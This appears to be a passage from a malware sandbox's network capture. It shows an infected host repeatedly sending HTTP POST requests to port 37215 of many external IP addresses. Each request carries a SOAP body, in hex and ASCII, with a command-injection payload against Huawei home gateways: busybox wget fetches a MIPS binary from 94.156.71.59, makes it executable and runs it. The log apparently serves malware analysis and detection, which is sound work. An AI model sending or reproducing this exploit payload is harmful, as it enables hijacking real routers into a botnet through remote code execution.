                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            902192.168.2.1334102156.104.219.20837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.934900999 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            903192.168.2.1347328156.49.85.15937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.936119080 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            904192.168.2.135643441.26.36.5137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.938925028 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            905192.168.2.134869241.52.216.4637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.940310955 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            906192.168.2.134441241.129.75.737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.941214085 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            907192.168.2.1336844156.193.101.10337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.308036089 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            908192.168.2.1359558156.233.139.6037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.308991909 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            909192.168.2.1339268197.255.169.9437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.310023069 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            910192.168.2.135586241.72.245.16737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.311233997 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            911192.168.2.1353328197.143.178.6637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.312465906 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
